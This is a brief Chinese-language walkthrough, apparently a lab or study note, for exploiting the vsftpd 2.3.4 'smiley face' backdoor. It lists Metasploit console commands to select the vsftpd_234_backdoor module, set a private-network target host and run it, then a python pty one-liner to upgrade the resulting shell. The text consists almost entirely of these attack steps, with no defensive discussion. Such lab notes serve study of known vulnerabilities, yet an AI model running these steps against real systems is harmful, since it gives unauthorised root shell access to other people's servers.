0%

smile

linux vsftp2.3.4笑脸漏洞
msfconsole //进入msf控制台

banner //查看有哪些banner

search vsftpd //查找包含vsftpd关键字的漏洞利用模块

use unix/ftp/vsftpd_234_backdoor //调用vsftpd_234漏洞利用模块

info unix/ftp/vsftpd_234_backdoor //查看vsftpd_234漏洞利用模块的信息

show options //查看vsftpd_234漏洞模块需要的选项

set RHOSTS 192.168.88.130 //设置vsftpd_234漏洞模块的目标主机选项
show options //再次查看选项

run //运行vsftpd_234漏洞模块

python -c “import pty;pty.spawn(‘/bin/bash’)” //获得一个友好的 shell